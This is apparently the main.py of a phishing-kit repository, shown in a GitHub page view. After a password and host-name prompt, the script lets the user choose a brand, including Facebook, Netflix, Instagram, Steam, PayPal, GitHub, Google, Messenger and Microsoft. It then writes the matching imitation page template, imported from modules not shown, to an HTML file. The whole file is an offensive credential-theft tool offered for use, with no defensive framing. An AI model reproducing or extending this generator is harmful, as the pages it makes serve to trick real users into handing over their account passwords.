-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmain.py
More file actions
122 lines (122 loc) · 2.74 KB
/
main.py
File metadata and controls
122 lines (122 loc) · 2.74 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
import sys;from library import *;
print(mainlogo)
p = (colored(': ','green'))
while True:
action = input(f'Password{p}')
if action == encNum:
clear()
print(mainlogo)
break
while True:
action = input(f'Host_name{p}')
if action == host_name:
clear()
print(mainlogo)
break
print(colored('Grantting OP\'s','green'))
for step in track(range(10)):
sleep(0.1)
step
print(op);
while True:
action = input(f'select{p}')#f
if action == ('%s%s' % (j,a)):
clear()
print('You\'ve selected Facebook')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(facebook)
file.close()
break#n
elif action == ('%s%s' % (j,b)):
clear()
print('You\'ve selected Netflix')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(netflix)
file.close()
break#i
elif action == ('%s%s' % (j,c)):
clear()
print('You\'ve selected Instagram')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(instagram)
file.close()
break#s
elif action == ('%s%s' % (j,d)):
clear()
print('You\'ve selected Steam')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(steam)
file.close()
break#p
elif action == ('%s%s' % (j,e)):
clear()
print('You\'ve selected Paypal')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(paypal)
file.close()
break#g
elif action == ('%s%s' % (j,f)):
clear()
print('You\'ve selected Github')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(github)
file.close()
break#vp
elif action == ('%s%s' % (j,g)):
clear()
print('You\'ve selected Vote rank page')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(vr)
file.close()
break#g
elif action == ('%s%s' % (j,h)):
clear()
print('You\'ve selected Google')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(google)
file.close()
break#m
elif action == ('%s%s' % (j,i)):
clear()
print('You\'ve selected Messanger')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(messanger)
file.close()
break#mi
elif action == ('%s%s' % (a,j)):
clear()
print('You\'ve selected Microsoft')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(microsoft)
file.close()
break#fbs
elif action == ('%s%s' % (a,a)):
clear()
print('You\'ve selected Fbsecure')
from prompter import *
from temps import *
file = open(f'{file_name}.html','w')
file.write(fbsecure)
file.close()
break
#end